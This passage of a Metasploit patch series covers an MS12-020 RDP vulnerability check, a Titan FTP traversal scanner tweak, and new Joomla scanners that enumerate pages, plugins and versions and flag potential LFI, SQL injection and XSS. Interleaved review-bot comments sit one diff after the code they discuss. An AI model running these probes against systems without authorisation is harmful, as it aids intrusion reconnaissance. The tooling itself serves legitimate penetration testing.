minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData return packet end def userRequest() packet = '' + - "\x03\x00" + # header - "\x00\x08" + # length - "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) - "\x28" # PER encoded PDU contents + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents return packet end @@ -178,7 +178,7 @@ def run_host(ip) channel_one_res = sock.recv(1024) if channel_one_res.unpack("H*").to_s[16..19] == '3e00' # vulnerable - print_good("#{peer} - Vulnerable MS12-020") + print_good("#{peer} - Vulnerable to MS12-020") report_goods # send ChannelRequestTwo - prevent bsod From 0490b4a853a076ef11e88b8f10fffa1d4603c5c0 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:18:28 -0600 Subject: [PATCH 169/421] I wanna know where this thing is stored. --- modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index e28eaa05620b..abe5c91903f2 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb 
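Review bot: The comment on the second `"\x04\x01\x01"` in `connectInitial` repeats `# callingDomainSelector`; in the MCS Connect-Initial structure the second octet string is the called selector, so it should read `# calledDomainSelector`. Since this hunk re-aligns every comment in the packet, it is the natural place to correct the label, which otherwise misleads anyone matching these bytes against a capture.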
@@ -100,6 +100,7 @@ def run_host(ip) fname = datastore['PATH'].gsub(/[\/\\]/, '_') p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname) + print_status("Saved in: #{p}") vprint_status(file_data.inspect) disconnect From d6e9f891ea566c316cf398abe0a507019544a28d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 20:44:49 +0100 Subject: [PATCH 170/421] Proposal for joomla-scanner --- .../auxiliary/scanner/http/joomla_pages.rb | 109 +++++++ .../auxiliary/scanner/http/joomla_plugins.rb | 175 ++++++++++ .../auxiliary/scanner/http/joomla_version.rb | 176 ++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 303 ------------------ 4 files changed, 460 insertions(+), 303 deletions(-) create mode 100755 modules/auxiliary/scanner/http/joomla_pages.rb create mode 100755 modules/auxiliary/scanner/http/joomla_plugins.rb create mode 100755 modules/auxiliary/scanner/http/joomla_version.rb delete mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 000000000000..77218063a5af --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb 
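Review bot: The added `print_status("Saved in: #{p}")` does not name the target, so when the scanner runs over several hosts the saved paths cannot be matched to hosts from the console output; `print_status("#{ip} - Saved in: #{p}")` would use the `run_host(ip)` argument for that. The `store_loot` call on the context line above passes the literal string `"rhost"` as its host argument, which looks unintended and would presumably file the loot under the wrong host; `ip` seems to be what was meant. `run_host` starts and ends outside the hunk, so both points should be checked against the full method.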
@@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: 
#{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 000000000000..37dff56fd4ca --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb 
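Review bot: The module's `'Name'` is `'Joomla Version Scanner'`, the same string used in joomla_version.rb from this commit, although the description says it scans for common pages; `'Name' => 'Joomla Page Scanner'` would keep the two modules distinguishable in search results and reports. In `scan_pages`, the character class in `res.body.gsub!(/[\r|\n]/, ' ')` also replaces every literal `|` in the body, and `/[\r\n]/` is what the code appears to intend (the same pattern recurs in joomla_plugins.rb and joomla_version.rb). The 403 fallback message `"#{ip} ip access to #{ip} ..."` reads like a leftover, since the sibling branches say `denied access to`. Listing `::ArgumentError` in the "Unable to Connect" rescue can also report a programming error as a network failure.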
@@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! 
Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: 
#{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 000000000000..5ccdfe89d763 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb 
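Review bot: In `plugin_search`, the `com_` branch reads `res1.code` without checking that `send_request_cgi` returned a response, while the other requests in this file guard with `return if res.nil?`; a nil here raises `NoMethodError`, which none of the `rescue` clauses catch, so one timed-out request would presumably end the enumeration for that host. Adding `return if res1.nil?` directly after the request covers it. In `run_host`, `File.open(datastore['PLUGINS'], 'rb').each_line` never closes the handle; the block form `File.open(datastore['PLUGINS'], 'rb') do |f| f.each_line do |line| ... end end` would. The `report_web_vuln` calls record `:path => tpath` rather than the path that produced the signature, and a single substring match (`root`, `SQL syntax`, `>alert`) is thin evidence for the confidence value given, so these entries are best treated as leads to verify.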
@@ -0,0 +1,176 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for information about the underlying + operating system and Joomla version. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def os_fingerprint(response) + if not response.headers.has_key?('Server') + return "Unkown OS (No Server Header)" + end + + case response.headers['Server'] + when /Win32/ + when /\(Windows/ + when /IIS/ + os = "Windows" + when /Apache\// + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + return os + end + + def fingerprint(response) + case response.body + when /<version.*\/?>(.+)<\/version\/?>/i + v = $1 + out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ + when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ + when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ + when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ + when /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / + when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ + when /22183 2011\-09\-30 09\:04\:32Z infograf768/ + when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/ + when /MooTools\=\{version\:\'1\.12\'\}/ + when /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ + when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/ + out = $1.split(/,/)[0] + when /(Copyright \(C\) 2005 - 200(6|7))/ + when /47 2005\-09\-15 02\:55\:27Z rhuk/ + when /423 2005\-10\-09 18\:23\:50Z stingrey/ + when /1005 2005\-11\-13 17\:33\:59Z stingrey/ + when /1570 2005\-12\-29 05\:53\:33Z eddieajau/ + when /2368 2006\-02\-14 17\:40\:02Z stingrey/ + when /4085 2006\-06\-21 16\:03\:54Z stingrey/ + when /4756 2006\-08\-25 16\:07\:11Z stingrey/ + when /5973 2006\-12\-11 01\:26\:33Z robs/ + when /5975 2006\-12\-11 01\:26\:33Z robs/ + out = "1.0" + else + out = 'Unknown Joomla' + end + return out + end + + def check_file(tpath, file, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{file}", + 'method' => 'GET' + }) + + return :abort if res.nil? 
+ + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + files = [ + 'language/en-GB/en-GB.xml', + 'templates/system/css/system.css', + 'media/system/js/mootools-more.js', + 'language/en-GB/en-GB.ini', + 'htaccess.txt', + 'language/en-GB/en-GB.com_media.ini' + ] + + vprint_status("#{peer} - Checking Joomla version") + files.each do |file| + joomla_found = check_file(tpath, file, ip) + return if joomla_found == :abort + break if 
joomla_found + end + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb deleted file mode 100755 index 2ad9d2f040d9..000000000000 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ /dev/null 
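Review bot: `fingerprint` and `os_fingerprint` pass text chosen by the scanned server (the `<version>` capture, the first `Keywords` entry and the raw `Server` header) to `print_good` and `report_note` with no length or character filtering, so a hostile or misconfigured host can write control characters or very long strings into the operator's console and the stored note. Because `check_file` first flattens the body with `gsub!`, the greedy `(.+)` in `/<version.*\/?>(.+)<\/version\/?>/i` can also run to the last `</version>` in the response. Bounding the capture, for example `/<version[^>]*>\s*([\w.\- ]{1,32})\s*<\/version>/i`, and stripping non-printable characters from the header before it is printed would limit both. The string `"Unkown OS (No Server Header)"` is misspelled.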
@@ -1,303 +0,0 @@ -## -# $Id: joomla_vulnscan.rb -## -## -# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'Joomla Scanner', - 'Description' => %q{ - This module scans a Joomla install for information, plugins and potential vulnerabilites. - }, - 'Author' => [ 'newpid0' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), - OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), - - OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") - ] - ) - - ], self.class) - end - - def osfingerprint(response) - if(response.headers.has_key?('Server') ) - if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) - os = "Windows" - elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" - else - os = "Unknown Server Header Reporting: "+response.headers['Server'] - end - end - return os - end - - def fingerprint(response) - if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) - v = $1 - out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" - elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or - response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or - response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) - out = "1.6" - elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) - out = "1.7" - elsif(response.body =~ /Joomla! 1.5/ or - response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) - out = "1.5" - elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or - response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) - out = "2.5" - elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/) - out = $1.split(/,/)[0] - elsif(response.body =~ /(Copyright \(C\) 2005 - 200(6|7))/ or - response.body =~/47 2005\-09\-15 02\:55\:27Z rhuk/ or response.body =~/423 2005\-10\-09 18\:23\:50Z stingrey/ or - response.body =~/1005 2005\-11\-13 17\:33\:59Z stingrey/ or response.body =~/1570 2005\-12\-29 05\:53\:33Z eddieajau/ or - response.body =~/2368 2006\-02\-14 17\:40\:02Z stingrey/ or response.body =~/4085 2006\-06\-21 16\:03\:54Z stingrey/ or - response.body =~/4756 2006\-08\-25 16\:07\:11Z stingrey/ or response.body =~/5973 2006\-12\-11 01\:26\:33Z robs/ or - response.body =~/5975 2006\-12\-11 01\:26\:33Z robs/) - out = "1.0" - else - out = 'Unknown Joomla' - end - return out - end - - def peer - return "#{rhost}:#{rport}" - end - - def run_host(ip) - tpath = normalize_uri(target_uri.path) - if tpath[-1,1] != '/' - tpath += '/' - end - apps = [ 'languaage/en-GB/en-GB.xml', - 
'templates/system/css/system.css', - 'media/system/js/mootools-more.js', - 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', - 'index.php/component/users/?view=registration','htaccess.txt'] - vprint_status("#{peer} - Checking Joomla version") - apps.each do |app| - app_status = check_app(tpath, app, ip) - return if app_status == :abort - break if app_status - end - vprint_status("#{peer} - Checking for interesting pages") - iapps.each do |iapp| - scan_pages(tpath,iapp,ip) - end - if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking for interesting plugins") - bres = send_request_cgi({ - 'uri' => tpath, - 'method' => 'GET', - }, 5) - return if not bres or not bres.body or not bres.code - bres.body.gsub!(/[\r|\n]/, ' ') - File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| - papp = bapp.chomp - plugin_search(tpath,papp,ip,bres) - end - end - end - - def check_app(tpath, app, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << app, - 'method' => 'GET', - }) - return :abort if res.nil? 
- return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - os = osfingerprint(res) - if (res.code == 200) - out = fingerprint(res) - return if not out - if(out =~ /Unknown Joomla/) - print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") - return false - else - print_good("#{peer} - Joomla Version:#{out} from: #{app} ") - print_good("#{peer} - OS: #{os}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Version', - :data => out - ) - return true - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def scan_pages(tpath, iapp, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << iapp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - if (res.code == 200) - if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "**Administrator Login Page" - elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) - sout = 
"**Registration Page" - else - sout = iapp - end - return if not sout - if(sout == iapp) - print_good("#{peer} - Page: #{tpath}#{iapp}") - elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Pages', - :data => sout - ) - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def plugin_search(tpath, papp, ip, bres) - res = send_request_cgi({ - 'uri' => "#{tpath}" << papp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - osize = bres.body.size - nsize = res.body.size - if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! 
Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") - if (papp =~/passwd/ and res.body !~/root/) - vprint_error("#{peer} - Vulnerability: LFI not found") - elsif(papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") - elsif(papp =~/>alert/ and res.body !~/>alert/) - vprint_error("#{peer} - Vulnerability: No XSS") - elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") - elsif(res.body =~/SQL syntax/ ) - print_good("#{peer} - Vulnerability: Potential SQL Injection") - elsif(papp =~/com_/) - vars = papp.split('_') - pages = vars[1].gsub('/','') - res1 = send_request_cgi({ - 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", - 'method' => 'GET', - }, 5) - if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") - else - vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") - end - end - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Plugin Found', - :data => papp - ) - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} ip access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - 
